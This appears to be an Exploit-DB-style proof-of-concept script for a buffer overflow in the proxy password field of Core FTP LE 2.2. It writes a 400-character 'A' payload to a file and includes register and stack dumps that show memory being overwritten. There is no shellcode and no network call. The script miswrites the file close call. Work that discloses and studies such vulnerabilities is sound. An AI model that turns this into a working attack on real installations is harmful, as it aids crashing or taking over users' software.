#!/usr/bin/env python
'''
# Exploit Title: Core FTP Le v2.2 - Proxy Password Buffer Overflow
# Date: 2016-7-11
# Author: s0nk3y
# Software Link: ftp://ftp.coreftp.com/coreftplite.exe
# Version: 2.2
# Tested on: Windows XP
# CVE: N/A
# Type: Buffer Overflow
[+] Proof of concept
Click options (Global Settings) -> Proxy -> enter the password and input "A"*400 -> Ok
[+] Registers Detail:
EAX 0012CF54 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
ECX 41414145
EDX 0012CE64
EBX 41414145
ESP 0012CB1C
EBP 0012D0C4 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
ESI 41414141
EDI 0012CF54 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
EIP 004A1523 coreftp.004A1523
'''
buffer = "A" * 400
exploit = open("exploit.txt","w")
exploit.write(buffer)
exploit.close
'''
[+] Stack:
0012CCEC 00000003 �...
0012CCF0 00498BFE þ‹I. RETURN to coreftp.00498BFE from coreftp.004A1520
0012CCF4 0012D124 $�. ASCII "AAAAAAAAAAAAA...
0012CCF8 0012D034 4�.
0012CCFC 41414141 AAAA
0012CD00 00000000 ....
0012CD04 41414141 AAAA
0012CD08 41414141 AAAA
0012CD0C 41414141 AAAA
0012CD10 41414141 AAAA
0012CD14 41414141 AAAA
0012CD18 41414141 AAAA
0012CD1C 41414141 AAAA
....
'''
